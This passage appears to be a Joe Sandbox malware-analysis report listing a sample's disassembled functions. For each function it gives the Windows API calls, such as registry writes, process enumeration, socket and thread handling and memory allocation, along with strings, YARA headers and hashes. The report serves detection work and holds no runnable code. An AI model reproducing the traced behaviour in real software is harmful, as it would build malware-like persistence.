• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: Message$ClassWindow$CreateDestroyDispatchErrorHandleLastModuleRegisterTranslateUnregister_memset
• String ID: {9C8B46D6-3D59-421D-A2D1-8F95C9197AC8}
• API String ID: 1736019982-1830929042
• Opcode ID: f00d0042c4d2c0c8e335671dc0d61eb239018f1e948620eab4fbe8c23d899b5f
• Instruction ID: 77169be8e64fe3d59fc942b140b51212e9544dd51d6326126b497fb0f8ac8423
• Opcode Fuzzy Hash: f00d0042c4d2c0c8e335671dc0d61eb239018f1e948620eab4fbe8c23d899b5f
• Instruction Fuzzy Hash: 9F217F75950204ABD727DFA0EC4AFAD7B7DEB08701F14901DE50DA62D0DB745985CF60
APIs
• _memset.LIBCMT ref: 00309F00
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00309F16
• __snwprintf.LIBCMT ref: 00309F3A
• RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 00309F55
• lstrlenW.KERNEL32(?), ref: 00309F66
• RegSetValueExW.ADVAPI32(?,{C3120582-398C-4F3B-A956-7E9F9DB9EF8E},00000000,00000001,?,00000002), ref: 00309F88
• RegCloseKey.ADVAPI32(?), ref: 00309F99
• RegCloseKey.ADVAPI32(?), ref: 00309FAD
Strings
• {C3120582-398C-4F3B-A956-7E9F9DB9EF8E}, xrefs: 00309F7C
• {BB52E685-57DB-490D-A4DD-CCF2F7D90D58}, xrefs: 00309F24
• SOFTWARE\%s, xrefs: 00309F29
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: Close$FileModuleNameOpenValue__snwprintf_memsetlstrlen
• String ID: SOFTWARE\%s${BB52E685-57DB-490D-A4DD-CCF2F7D90D58}${C3120582-398C-4F3B-A956-7E9F9DB9EF8E}
• API String ID: 1214033602-3858757917
• Opcode ID: abbca84b1737c3124d3cf6d625bad9abe57056434fcacf7e0e0287fdb2458cd4
• Instruction ID: 221f820a65c42a26ad9b25fd998154a1f9de99ed4cda6fec735c435fb9a9b3ad
• Opcode Fuzzy Hash: abbca84b1737c3124d3cf6d625bad9abe57056434fcacf7e0e0287fdb2458cd4
• Instruction Fuzzy Hash: E311B2B5A40314ABD731DB60DC4DFEA737CAF44B00F104688F61DDA092EAB59A84CBA1
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00302694
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003026B2
                                                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 003026DA
                                                                                                            • lstrcmpiW.KERNEL32(?,-00372F28,00000000,?,?,?,?,?), ref: 0030278C
                                                                                                            • _memset.LIBCMT ref: 003027B1
                                                                                                            • lstrcpyW.KERNEL32(?,-00372F28,?,?,?,?,?,?,?), ref: 003027CF
                                                                                                              • Part of subcall function 00301C60: _wcsrchr.LIBCMT ref: 00301C6C
                                                                                                            • lstrcpyW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00302815
                                                                                                              • Part of subcall function 00302A80: construct.LIBCPMTD ref: 00302B09
                                                                                                            • StrCatW.SHLWAPI(00000000,00332714), ref: 00302863
                                                                                                            • StrCatW.SHLWAPI(00000000,?), ref: 00302874
                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 003028D6
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 003028E8
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003028F8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LocalProcess32lstrcpy$AllocCloseCreateFirstFreeHandleNextSnapshotToolhelp32_memset_wcsrchrconstructlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 4081567023-0
                                                                                                            • Opcode ID: cd9585dbd19bc1fc422441f40e542d67354e53185be0c209879bf922c800fab2
                                                                                                            • Instruction ID: 89aad3f27e0c93ffb7f75e1a41dab5cca40ed1b17b98aaf56d07f5d6862c20ee
                                                                                                            • Opcode Fuzzy Hash: cd9585dbd19bc1fc422441f40e542d67354e53185be0c209879bf922c800fab2
                                                                                                            • Instruction Fuzzy Hash: C38152B1D05218DBCB26DBA4CC99BDEB778BF58300F104598E11ABB190DB745A88CF60
                                                                                                            APIs
                                                                                                            • GetWindowsDirectoryW.KERNEL32(8U0,00000104,?,00305538,00000000), ref: 00309CF2
                                                                                                            • __snwprintf.LIBCMT ref: 00309D0E
                                                                                                            • GetSystemDirectoryW.KERNEL32(8U0,00000104), ref: 00309D2E
                                                                                                            • __snwprintf.LIBCMT ref: 00309D4A
                                                                                                            Strings
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Directory__snwprintf$SystemWindows
                                                                                                            • String ID: %s\CMD.EXE$%s\EXPLORER.EXE$%s\SVCHOST.EXE$8U0
                                                                                                            • API String ID: 2322266053-1472804483
                                                                                                            • Opcode ID: 6540ef587ec4f50627a97a16b6be48d9210ec444e3962cd1c25e67ea7e6bedca
                                                                                                            • Instruction ID: 61b7c5c1bb2a5c2355c1e468652df7bb82633da7f7bafb9fe0ba72180c0fcaaf
                                                                                                            • Opcode Fuzzy Hash: 6540ef587ec4f50627a97a16b6be48d9210ec444e3962cd1c25e67ea7e6bedca
                                                                                                            • Instruction Fuzzy Hash: FB1154B1681344ABEF16DE54DC95FBB376DAB45700F14881EFA188E1C1D6B4D980CB51
                                                                                                            APIs
                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 00306EEB
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 0030702F
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00307073
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 003070B5
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00307117
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 003071A5
                                                                                                            • shutdown.WS2_32(?,00000002), ref: 0030723B
                                                                                                            • closesocket.WS2_32(?), ref: 00307245
                                                                                                              • Part of subcall function 00320CD0: ___crtGetLocaleInfoEx.LIBCMTD ref: 00320CED
                                                                                                              • Part of subcall function 00320950: ___crtGetLocaleInfoEx.LIBCMTD ref: 0032096D
                                                                                                            Strings
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleInfoLocale___crt$EventFreeObjectSingleVirtualWaitclosesocketsetsockoptshutdown
                                                                                                            • String ID: d
                                                                                                            • API String ID: 3427925336-2564639436
                                                                                                            • Opcode ID: 0ec0086ef559574b65ab97bad19bf1729a1a014d2f38465e30eea2cded1cd4b6
                                                                                                            • Instruction ID: 6541e96eb61f24bb9950641735fd724fb11962441ba344d0dcac89085b8e6d51
                                                                                                            • Opcode Fuzzy Hash: 0ec0086ef559574b65ab97bad19bf1729a1a014d2f38465e30eea2cded1cd4b6
                                                                                                            • Instruction Fuzzy Hash: A0A14C71D001189FEB29DFA4CC95FAEB775FB54304F1082A8E119AB2C2D775AA85CF50
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000000,?,0031720B,?), ref: 003174EB
                                                                                                            • CloseHandle.KERNEL32(00000000,?,0031720B,?), ref: 00317523
                                                                                                            • CloseHandle.KERNEL32(00000000,?,0031720B,?), ref: 00317543
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,0031720B,?), ref: 0031755B
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,?,?,00000004,00000000), ref: 0031757A
                                                                                                            • ResumeThread.KERNEL32(00000000), ref: 003175A8
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 003175BE
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 003175C8
                                                                                                            Strings
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$CreateThread$EventObjectResumeSingleWait
                                                                                                            • String ID: d
                                                                                                            • API String ID: 144976343-2564639436
                                                                                                            • Opcode ID: 3b8e4d0bcbb270fdbd2883dd6d1b8bd0ded5d3f8693d68d7360318514618e035
                                                                                                            • Instruction ID: 7b5524dec39819170da9082c5fab2749f4c27bf441ca639d0069b1b76b8da5d7
                                                                                                            • Opcode Fuzzy Hash: 3b8e4d0bcbb270fdbd2883dd6d1b8bd0ded5d3f8693d68d7360318514618e035
                                                                                                            • Instruction Fuzzy Hash: 094129B4A04209DFDB09CF94C888BAEBBB6FB48304F24C548E515AB390C774D985CF90
                                                                                                            APIs
                                                                                                            • SHGetKnownFolderPath.SHELL32(?,00000000,00000000,?), ref: 0030FE74
                                                                                                            • lstrlenW.KERNEL32(?), ref: 0030FE86
                                                                                                            • lstrlenW.KERNEL32(00371110), ref: 0030FE99
                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 0030FEB2
                                                                                                            • __snwprintf.LIBCMT ref: 0030FEDA
                                                                                                            • lstrlenW.KERNEL32(00000000), ref: 0030FEE6
                                                                                                            • CoTaskMemFree.COMBASE(?), ref: 0030FEF5
                                                                                                            • CoTaskMemFree.COMBASE(?), ref: 0030FF04
                                                                                                            Strings
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$FreeTask$AllocFolderKnownLocalPath__snwprintf
                                                                                                            • String ID: %s\%s\
                                                                                                            • API String ID: 3447735180-2168696002
                                                                                                            • Opcode ID: 86630961ebc38eb3d9c3db888eda73f57d51d560c67e0a89b5bb09e2b203ed91
                                                                                                            • Instruction ID: c9eb3693756ca3ac81a4d37dcb59d4cf848c2ac3bb8f8e6e1391931c2afcd63b
                                                                                                            • Opcode Fuzzy Hash: 86630961ebc38eb3d9c3db888eda73f57d51d560c67e0a89b5bb09e2b203ed91
                                                                                                            • Instruction Fuzzy Hash: 0C3109B5D00209DFCB05CFA8D885AAEBBB9FF48300F108119E909AB350D734A945CFA4
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(?), ref: 00322049
                                                                                                              • Part of subcall function 00322450: CoInitialize.OLE32(00000000), ref: 00322466
                                                                                                              • Part of subcall function 00322450: CoCreateGuid.COMBASE(c 2), ref: 00322478
                                                                                                              • Part of subcall function 00322450: StringFromGUID2.COMBASE(c 2,?,00000027), ref: 00322490
                                                                                                              • Part of subcall function 00322450: wsprintfA.USER32 ref: 003224AB
                                                                                                              • Part of subcall function 00322450: LocalAlloc.KERNEL32(00000040,00000068), ref: 003224B8
                                                                                                              • Part of subcall function 00322450: und_memcpy.LIBCMTD ref: 00322505
                                                                                                              • Part of subcall function 00322450: LocalFree.KERNEL32(00000000), ref: 00322511
                                                                                                              • Part of subcall function 00322450: CoUninitialize.COMBASE ref: 00322517
                                                                                                              • Part of subcall function 0031FFF0: socket.WS2_32(00000002,00000001,00000006), ref: 0031FFFF
                                                                                                            • setsockopt.WS2_32(00000000,0000FFFF,00000080,?,00000004), ref: 003220F0
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00322428
                                                                                                              • Part of subcall function 00320950: WSACreateEvent.WS2_32 ref: 003209B0
                                                                                                              • Part of subcall function 00322530: LocalAlloc.KERNEL32(00000040,00000318), ref: 00322540
                                                                                                              • Part of subcall function 00322530: LoadLibraryW.KERNEL32(NTDLL.DLL), ref: 00322558
                                                                                                              • Part of subcall function 00322530: LocalFree.KERNEL32(00000000), ref: 0032256B
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 003223B3
                                                                                                            • WSAEventSelect.WS2_32(00000000,00000000,00000020), ref: 003223D8
                                                                                                            • und_memcpy.LIBCMTD ref: 003223F7
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0032240E
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0032241B
                                                                                                            • shutdown.WS2_32(00000000,00000002), ref: 00322437
                                                                                                            • closesocket.WS2_32(00000000), ref: 00322444
                                                                                                              • Part of subcall function 00320CD0: ___crtGetLocaleInfoEx.LIBCMTD ref: 00320CED
                                                                                                              • Part of subcall function 00320950: ___crtGetLocaleInfoEx.LIBCMTD ref: 0032096D
                                                                                                              • Part of subcall function 00320CD0: WSACreateEvent.WS2_32 ref: 00320D30
                                                                                                              • Part of subcall function 003226F0: LocalAlloc.KERNEL32(00000040,00000280), ref: 00322700
                                                                                                              • Part of subcall function 003226F0: lstrcpyW.KERNEL32(0000001C,CPU001), ref: 00322735
                                                                                                              • Part of subcall function 003226F0: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00322754
                                                                                                              • Part of subcall function 003226F0: LocalFree.KERNEL32(00000020), ref: 00322762
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$CreateEvent$Alloc$InfoLocale___crtund_memcpy$CloseFileFromGuidHandleInitializeLibraryLoadModuleNameSelectStringUninitializeclosesocketlstrcpylstrlensetsockoptshutdownsocketwsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 3642594451-0
                                                                                                            • Opcode ID: 111b3e3bec87ee5087346a4b60be2eb3699642973ae1e90a55b76a8c8c7f5703
                                                                                                            • Instruction ID: 65a207879d43e119cbd0a0946e29820014e85793e7c0d97634d6c96d6394d18c
                                                                                                            • Opcode Fuzzy Hash: 111b3e3bec87ee5087346a4b60be2eb3699642973ae1e90a55b76a8c8c7f5703
                                                                                                            • Instruction Fuzzy Hash: 31B120B5A00328BFEB25DB95DC45FEA7379AB48700F504198F608AB181E7716F84CF62
                                                                                                            APIs
                                                                                                            • __snwprintf.LIBCMT ref: 0030B3FF
                                                                                                            • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 0030B426
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0030B438
                                                                                                            • _memset.LIBCMT ref: 0030B446
                                                                                                            • GetSystemTime.KERNEL32(?), ref: 0030B465
                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 0030B476
                                                                                                            Strings
                                                                                                            • SOFTWARE\%s, xrefs: 0030B3EE
                                                                                                            • {BB52E685-57DB-490D-A4DD-CCF2F7D90D58}, xrefs: 0030B3E9
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Time$System$CloseCreateFile__snwprintf_memset
                                                                                                            • String ID: SOFTWARE\%s${BB52E685-57DB-490D-A4DD-CCF2F7D90D58}
                                                                                                            • API String ID: 3491885642-838102593
                                                                                                            • Opcode ID: 0e4b77501ff19165bbca2996be611d538e4c8c40e79a786d15a9f4aded5da7ee
                                                                                                            • Instruction ID: 5ca2206d87f601877a562b50c6b58950d476750f2264337e2c032c7e0408fd79
                                                                                                            • Opcode Fuzzy Hash: 0e4b77501ff19165bbca2996be611d538e4c8c40e79a786d15a9f4aded5da7ee
                                                                                                            • Instruction Fuzzy Hash: 20117771A54209B7EB21DBB0DC4AFFAB33CAB14704F500954BA099A1C2FBB59744C7A1
                                                                                                            APIs
                                                                                                            • _memset.LIBCMT ref: 00304670
                                                                                                            • __snwprintf.LIBCMT ref: 0030468E
                                                                                                            • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,000F003F,00000000,000017FC,00000000), ref: 003046B5
                                                                                                            • RegSetValueExW.ADVAPI32(000017FC,{108D3252-20F0-4C1B-940D-6ED5366D8FD3},00000000,00000003,003734D4,003045E8), ref: 003046D4
                                                                                                            • RegCloseKey.ADVAPI32(000017FC), ref: 003046E2
                                                                                                            • RegCloseKey.ADVAPI32(000017FC), ref: 003046F3
                                                                                                            Strings
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Close$CreateValue__snwprintf_memset
                                                                                                            • String ID: SOFTWARE\%s${108D3252-20F0-4C1B-940D-6ED5366D8FD3}
                                                                                                            • API String ID: 749045061-2357458413
                                                                                                            • Opcode ID: 910730a494e00d6f6bbf54902c517a377eaff5b8b52bcd75b96900211cd16481
                                                                                                            • Instruction ID: d18dd3231795798b5580ccba3d4f4a77fa0d876be54d9f82edc98730dc2b65bb
                                                                                                            • Opcode Fuzzy Hash: 910730a494e00d6f6bbf54902c517a377eaff5b8b52bcd75b96900211cd16481
                                                                                                            • Instruction Fuzzy Hash: E911657574430CBBE735DBA4EC8AFAA737CAF48B00F104544BB08AA1C1F6B69B409795
                                                                                                            APIs
                                                                                                            • _memset.LIBCMT ref: 003050B0
                                                                                                            • __snwprintf.LIBCMT ref: 003050CE
                                                                                                            • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 003050F5
                                                                                                            • RegSetValueExW.ADVAPI32(?,{DF4EE2DA-C20C-4BBF-97D5-4B94E23FE1C8},00000000,00000003,?,00000B3C), ref: 00305115
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00305123
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00305134
                                                                                                            Strings
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Close$CreateValue__snwprintf_memset
                                                                                                            • String ID: SOFTWARE\%s${DF4EE2DA-C20C-4BBF-97D5-4B94E23FE1C8}
                                                                                                            • API String ID: 749045061-237943000
                                                                                                            • Opcode ID: a994145e69a306521a9a2548b6233c0a42e0b506f611dbe70b6d5c550e03d6b7
                                                                                                            • Instruction ID: 8c03256e85cb1729fc8a4dc986020c1f7912fd728203c495b7789d2519c8982c
                                                                                                            • Opcode Fuzzy Hash: a994145e69a306521a9a2548b6233c0a42e0b506f611dbe70b6d5c550e03d6b7
                                                                                                            • Instruction Fuzzy Hash: 36119675754308BBE735DBA0DC4AFAB737CAF54B00F504544B70CAA1C0E6B59B409B95
                                                                                                            APIs
                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 00306B42
                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00306C3D
                                                                                                              • Part of subcall function 00320950: WSACreateEvent.WS2_32 ref: 003209B0
                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00306C9A
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00306DE6
                                                                                                              • Part of subcall function 00308A80: LocalFree.KERNEL32(00000000), ref: 00308AE0
                                                                                                              • Part of subcall function 00308A80: LocalFree.KERNEL32(00000000), ref: 00308AF0
                                                                                                              • Part of subcall function 00308A80: LocalAlloc.KERNEL32(00000040,00030010), ref: 00308B3B
                                                                                                              • Part of subcall function 00308A80: LocalAlloc.KERNEL32(00000040,00008AD0), ref: 00308B55
                                                                                                              • Part of subcall function 00308A80: _memmove.LIBCMT ref: 00308B76
                                                                                                              • Part of subcall function 00308A80: lstrcpyW.KERNEL32(00000000,00000000), ref: 00308B86
                                                                                                              • Part of subcall function 00308A80: lstrcpyW.KERNEL32(-00010000,00000000), ref: 00308B99
                                                                                                              • Part of subcall function 00308A80: lstrcpyW.KERNEL32(-00020000,00000000), ref: 00308BAD
                                                                                                              • Part of subcall function 003081C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,00308D2B,00316B10,00000000), ref: 003081EB
                                                                                                              • Part of subcall function 003081C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,00308D2B), ref: 00308205
                                                                                                              • Part of subcall function 003081C0: wnsprintfW.SHLWAPI ref: 00308235
                                                                                                              • Part of subcall function 003081C0: wnsprintfW.SHLWAPI ref: 00308251
                                                                                                              • Part of subcall function 003081C0: LocalFree.KERNEL32(00000000), ref: 00308A43
                                                                                                              • Part of subcall function 00309400: LocalAlloc.KERNEL32(00000040,00306D26,?,00306D8A,00000000,00000000,?), ref: 00309416
                                                                                                              • Part of subcall function 00309400: _memmove.LIBCMT ref: 00309435
                                                                                                              • Part of subcall function 00309400: lstrcpyW.KERNEL32(?,00000000,00000000,00000000), ref: 003094FF
                                                                                                              • Part of subcall function 00309400: StrStrIW.SHLWAPI(?,.DLL), ref: 00309511
                                                                                                              • Part of subcall function 00309400: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 0030953C
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00306DAD
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00306DBA
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00306DFC
                                                                                                            • shutdown.WS2_32(?,00000002), ref: 00306E68
                                                                                                            • closesocket.WS2_32(?), ref: 00306E72
                                                                                                              • Part of subcall function 00320CD0: ___crtGetLocaleInfoEx.LIBCMTD ref: 00320CED
                                                                                                              • Part of subcall function 00320950: ___crtGetLocaleInfoEx.LIBCMTD ref: 0032096D
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$AllocFree$lstrcpy$CreateInfoLocale___crt_memmovewnsprintf$EventFileclosesocketsetsockoptshutdown
                                                                                                            • String ID:
                                                                                                            • API String ID: 3185571019-0
                                                                                                            • Opcode ID: a3af209775b80945dad3c4c99e2f711aa1e6927f875085479f82f39564cda2cd
                                                                                                            • Instruction ID: b317bdfcad04be47a1b1338f5bd9ac7444a842a34740eab929ddd228006c08dd
                                                                                                            • Opcode Fuzzy Hash: a3af209775b80945dad3c4c99e2f711aa1e6927f875085479f82f39564cda2cd
                                                                                                            • Instruction Fuzzy Hash: 40B11EB5E00218AFEB25DB94CC56FEEB778BF48310F508198E619AB2C1D7715A84CF61
                                                                                                            APIs
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$AllocLocal_memmove
                                                                                                            • String ID:
                                                                                                            • API String ID: 39496755-0
                                                                                                            • Opcode ID: 8b401cf64a9d3d1bebcc9615f3ec337204d4e4a0cb4e68a2c3eb75a69be47bd2
                                                                                                            • Instruction ID: b384228420c511827f6e27558f540865494f15a95be914e66ca8f20ed7d5dd99
                                                                                                            • Opcode Fuzzy Hash: 8b401cf64a9d3d1bebcc9615f3ec337204d4e4a0cb4e68a2c3eb75a69be47bd2
                                                                                                            • Instruction Fuzzy Hash: A971D874A0410ADFCF09CF98D981AEEB7B6FF4C304F248559E905AB241D734AE95DBA0
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000FA0), ref: 0031EC09
                                                                                                            • und_memcpy.LIBCMTD ref: 0031EC2F
                                                                                                            • und_memcpy.LIBCMTD ref: 0031EC4A
                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0031EC68
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031EC84
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocLocalund_memcpy$FreeVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 2616075706-0
                                                                                                            • Opcode ID: 169d6d1e7c7b262174ec19d761686e53a7ef3985edf953b47a7e57b9e4bf83d6
                                                                                                            • Instruction ID: 6eb5214b6f452ed3b3d8db613c0d295b7a309c0fd615f2f81710ee69614681ee
                                                                                                            • Opcode Fuzzy Hash: 169d6d1e7c7b262174ec19d761686e53a7ef3985edf953b47a7e57b9e4bf83d6
                                                                                                            • Instruction Fuzzy Hash: 2871D2B5A00228CBCB68CF54DC84BDDB7B5AF98305F1484D9E50DAB351DA31AEC58F40
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000014), ref: 0031C24A
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,0031C360,00000000,00000000,00000000), ref: 0031C291
                                                                                                            • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 0031C2EB
                                                                                                            • GetExitCodeThread.KERNEL32(00000000,?), ref: 0031C302
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031C311
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031C31B
                                                                                                            • TerminateThread.KERNEL32(00000000,00000000), ref: 0031C336
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031C340
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031C34A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LocalThread$CloseFreeHandle$AllocCodeCreateExitMultipleObjectsTerminateWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 872497719-0
                                                                                                            • Opcode ID: 41ec70808b806e0bef5bb364e64e8a15a425dccdf746cbfe31f727b4487b94bb
                                                                                                            • Instruction ID: 72d60f9781e3816090f5bf187fc13d35ecb427ca92b1a47608f2bddbb3bede0c
